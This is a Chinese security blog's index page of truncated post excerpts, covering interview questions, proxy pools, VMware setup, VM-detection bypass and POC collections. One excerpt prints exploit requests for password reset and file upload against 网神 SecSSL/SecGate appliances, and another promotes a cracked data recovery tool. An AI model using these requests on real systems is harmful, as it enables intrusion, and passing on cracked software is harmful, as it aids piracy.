全网二次首发!!!最全的网安面试题附参考答案(涵盖护网、红队、逆向、密码学、二进制)-杨CC
1- 杨CC有话说 全网二次首发!!!最全的网安面试题附参考答案(涵盖护网、红队、逆向、密码学、二进制)上万道安全面试题已经全部为您划分好,适用于网络安全所有岗位!!! HR:请问………… 我:叽里咕噜说啥呢,看看八股文上写了没 原网站:http://113.45.17.228:4000 原Github 地址: https://github.com/duckpigdog/Sec-Interview 原作者:duckpigdog 2- 信息收集系列如何处理子域名爆破的泛解析问题1. 泛解析的探测与识别 在进行子域名爆破之前,第一步是确定目标域名是否开启了泛解析 操作方法: 随机生成一个不存在的子域名:例如,random-string-123.example.com。这个字符串要足够随机且复杂,以确保它不可能是真实存在的子域名 对其进行 DNS 查询:使用 ping、dig 或 nslookup 等命令来查询其 IP 地址 记录返回的 IP 地址:如果返回了一个 IP 地址,那么这个地址很可能就是泛解析的地址 为了提高准确性,你可以多生成几个随机子域名并重复上述步骤。如果它...
细说六十仙命配二十四山-杨CC
1- 杨CC有话说 首先我们要知道二十四山\六十仙命,均为风水核心,所以本文以六十仙命配二十四山原文,以及个人理解,进行编译的文章.以让各位学者可以更好的理解风水学.本文核心为:六十仙命配二十四山 - 卷一 - 六十仙命坐山宜忌神煞.其中包含多种坐山宜忌神煞,可在左边的目录中,寻找对应的说法. 2- 卷一 - 六十仙命坐山宜忌神煞2.1 命冲 座山冲仙命,大凶不用. 如甲子命忌座午山,若座丙山兼午,或丁山兼午,亦忌不用. 那这是啥意思呢? 这里的座山,就是所谓的用山,也就是二十四山中的一山,而冲仙命,则就是与自身仙命对冲,则就是大凶,不可用. 而仙命,也就是所谓的六十甲子(也叫做六十花甲,也叫纳音),例如:甲子\乙丑\丙寅…等,在这里被称作为六十仙命(后续不再解释仙命的含义). 第二句.就是举了一个例子,甲子命,忌讳座午山.甲子命,座丙兼午山,则不用,座丁兼午山,则不用. 2.1.1 命冲 - 对照表 仙命 子 丑 寅 卯 辰 巳 午 未 申 酉 戌 亥 冲山 午 未 申 酉 戌 亥 子 丑 寅 卯 辰 巳 2.2 命杀三方 劫杀 \ 灾杀 \ 正杀 曰...
如何部署长期代理池?—Yccol-杨CC
1- 杨CC有话说 首先呢,部署代理池,我们所使用的是开源的:Yccol,项目网址:Yccol开源网址Yccol_包括了:API-Pro-GUI-基础版本,是可以直接进行商用的一套源代码.并且使用:Apache-2.0 license 协议,如果不想部署API,而Pro-GUI版本均依靠API进行运作.如果你不想部署API是那么你可以尝试使用fifa0如果想查看模块设计,请点击:点击查看设计模块可区分国内外的代理池。还包含了ip定位功能 2- Yccol-准备工具 服务器(如果商用需要准备) FOFA API 密钥 python 3.11.5 及以上 Mysql 5.7 git 3- API部署(核心). 环境部署之前,需要提前安装好:mysql 5.7 和 python3.11.5 以上的版本和git命令. 这里我们不再过多赘述,不会安装直接百度即可. 克隆最新代码 12git clone https://github.com/ycc77cn/yccolcd yccol 如果克隆速度过慢,请开启代理. 克隆以后,看到下属的目录,说明克隆成功.就可以开始部署了. 3.1...
Linux-控制安卓手机工具
1- 杨CC有话说 因为我个人测试软件,然后需要控制安卓手机,但是呢,我个人是Linux电脑,所以我需要一个工具,用来远程控制安卓手机,随后在Linux中,找到了这个工具,随后我就编写了这一个文章.而且,这款工具,支持安卓群控,可以同时控制多台安卓手机,也支持安卓模拟器,可以用来板砖. 2- 功能介绍 QtScrcpy 可以通过 USB / 网络连接Android设备,并进行显示和控制。无需root权限。 同时支持 GNU/Linux ,Windows 和 MacOS 三大主流桌面平台。 它专注于: 精致 (仅显示设备屏幕) 性能 (30~60fps) 质量 (1920×1080以上) 低延迟 (35~70ms) 快速启动 (1s 内就可以看到第一帧图像) 非侵入性 (不在设备上安装任何软件) 无需root 3- QtScrcpy 和 Scrcpy区别 关键点 scrcpy QtScrcpy 界面 sdl qt 视频解码 ffmpeg ffmpeg 视频渲染 sdl opengl 跨平台基础设施 自己封装 Qt ...
数据恢复工具-支持Windows(特殊操作下可以恢复Linux和手机数据)
1- 杨CC有话说 首先,这款工具牛逼,其次这款工具是破解版,不需要付费,最后,这款工具支持Windows(特殊操作下可以恢复Linux和手机数据) 2- 功能介绍 功能很简单 扫描,然后恢复数据 再说一边,从杨CC资源站下载的工具,是破解版,不需要付费. 3- 下载 点击:杨CC资源站 找到: 其他资源 - 电脑工具 - 就可以看到了 再说一边!从杨CC资源站下载的工具,是破解版,不需要付费. 4- 使用方法 下载后,解压,然后进入:R-Studio目录 然后双击:RStudioPortable 就可以打开这款工具了,工具启动中… 工具启动成功 4.1 简单恢复数据 右键 -> 显示文件 然后就找到文件删除的目录 就可以找到删除的文件了. 那么,此刻,就有人要问了,这种方式没有恢复怎么办? 那么,我们需要使用: 4.2 使用驱动恢复数据(高级数据恢复) 选中数据丢失的磁盘,我这里以E盘为例 选择:扫描 选择: 扫描整个驱动器 点击扫描 然后等待扫描完成 扫描一会后,会提示扫描剩余时间 最后等待完成. 扫描完成后,会出现两个新的选项 在图片中可以在左侧看到多...
Windows-Linux-amc全系统安装vmware虚拟机
1- 杨CC有话说 vmware虚拟机在17版本以后,就已经全面开放,不再需要购买,这篇文章,将介绍如何在Windows、Linux、amc系统安装vmware虚拟机. 2- 安装vmware虚拟机2.1 Windows安装vmware虚拟机 准备工作 确认系统要求操作系统:Windows 10/11 专业版 / 企业版(家庭版需开启 Hyper-V 兼容模式,部分功能受限)。硬件:CPU 支持虚拟化技术(Intel VT-x 或 AMD-V),并在 BIOS 中启用(重启电脑按 F2/F10/Del 进入 BIOS,找到 “Virtualization Technology” 设为 Enabled)。内存:至少 4GB(推荐 8GB 以上,否则虚拟机运行卡顿)。 下载 VMware 安装包访问 VMware 官网,选择 “Workstation Pro”,根据系统版本(64 位)下载对应安装包(如 VMware-workstation-full-17.0.0.exe)。如果无法下载,可以访问垮克网盘下载。 然后找到:VMware...
vmware虚拟机反检测-绕过虚拟机检测教程
1- 杨CC的评价 该文章为:如何绕过虚拟机检测?主要讲解了绕过虚拟机检测的主流方式和主流的反检查技巧。我的计算中没有vmware虚拟机,所以不再进行截图 2- 主流的虚拟机检测原理2.1 硬件信息: 虚拟机拥有一些物理机没有的硬件信息,例如主板型号:VMware virtual Platform,其他硬件信息如:CPUID、硬盘序列号、主板序列号、网卡序列号等。 2.2 系统痕迹: 虚拟机工具(如VMware Tools、lVirtuaBox Guest Additions)的服务、进程或注册表项。同样会被某些软件进行检测。 2.3 底层指令: 某些虚拟机软件会修改底层指令,如:VMware修改了CPUID指令,使其返回虚拟机信息。 某些软件会检测这些底层指令的返回值,从而判断是否运行在虚拟机中。 2.4 环境差异: 如:内存映射方式、中断处理机制、网络MAC地址前缀(例如VMware的前缀地址为:00:0c:29)等。 3- Vmware虚拟机 主流反检测方式3.1 VMware 主流反检测方式3.1.1 修改虚拟机配置文件(核心)关闭虚拟机后,找到.vmx配置文件...
2025年最新的20W+的Nuclei-POC
1- 杨CC的评价> 是的,20W+的Nuclei-POC,没有之一。 > 非常牛而逼之。 > 不过,全部都是yaml文件格式的POC,毕竟是Nuclei,一些支持yaml格式的poc可以正常使用。 2- 分类介绍 我们先来看一下总体数量。 从这里可以 看到,总数量拥有208936个poc, 然后,我们再来把目录中的所有poc目录统计一下。 图1 图2 从图1和图2中,可以看到,POC分类有80+个。 而且我们通过观察目录可以发现,包含:adobe、apache、aws、cisco、cnnvd、cnvd、ftp、zfuz、ftp、git、http、java、mysql、nginx、oracle、php、python、ruby、sql、ssh、web、vmware、xss等多个poc分类。 我们下面会将不同的分类进行介绍。 3- 部分POC介绍3.1 adobe 数量上,我们来看下图 总数量,高达300+个poc。 然后我们来简单看一些poc。 adobe/SSRF-AEM-2018-12809.yaml 123456789101112131...
150个常见厂商的POC合集-包含部分exp
一、杨CC对工具的评价 部分来源于2023HW发现的漏洞POC,包含多个厂商。部分来源于公众号,部分来源于网络。 二、POC合集1、网神 SecSSL 3600安全接入网关系统 任意密码修改漏洞POC 1234POST /changepass.php?type=2 Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}old_pass=&password=Test123!@&repassword=Test123!@ 2、网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞123456789101112131415161718192021222324252627POST /?g=obj_app_upfile HTTP/1.1Host: x.x.x...
Ustat-一个免费-好用-专业-不用实名的网站统计工具
1- 杨CC对工具的评价百度统计有的它全有,没有的,它也有。 google统计有的它也有。google统计没有,它当然有! 最重要的是好用、便宜、专业、不用实名。更何况,现在还有免费版! 为什么不用呢? 官网链接 ,或者使用教程的位置,都会官网链接. 2- 功能介绍 我们以当前网站统计为例,简单介绍下功能。 概览界面支持每天、每周、每月、每年的统计。 数据对比 趋势分析 实时访客 来源分析 访问分析 访客分析 搜索引擎 蜘蛛爬虫 访客列表 会话列表 访问IP 事件分析 页面热点 – 这个功能很实用,可以查看用户点击位置最多的位置。 图1: 图2: 说明:红色点越密集,说明点击率越高。也说明用户对这块比较感兴趣。 说明:点击率=点击次数/页面访问次数 一共就是这么一些功能,相当强大,功能齐全。 3- 使用方法 1.注册账号 点击:注册,访问官网。然后注册账号。如果此处链接不可用,请点击:官网链接 2.添加站点 注册登录后,点击右上角的图标,随后点击“添加” 添加完成后,会在主屏幕上显示出来你添加的网站。 3.获取代码 点...